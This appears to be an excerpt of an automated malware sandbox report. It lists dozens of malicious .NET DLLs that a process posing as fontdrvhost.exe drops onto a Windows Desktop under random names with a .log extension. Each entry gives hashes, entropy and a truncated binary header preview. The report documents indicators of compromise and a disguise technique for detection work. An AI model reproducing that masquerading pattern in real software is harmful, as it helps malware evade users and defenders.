                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\MHvzAhUM.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MLVQXpXH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MMDorhKp.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\MPlPWbPk.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\MTLhtkSf.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NMMXsbef.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NWMxEuQr.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NgoGZspx.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\NmOPODYO.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\OEWHVhjH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ORiFVhtH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\OemrfNDp.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\OgxpbmIn.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\OjpXkDnJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\OnJqPAWm.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\OzZYIDTF.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PCgnLZlk.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PEqxAxdY.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\PwAgeDiA.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\QfCxRbIn.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\QkEpPQey.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
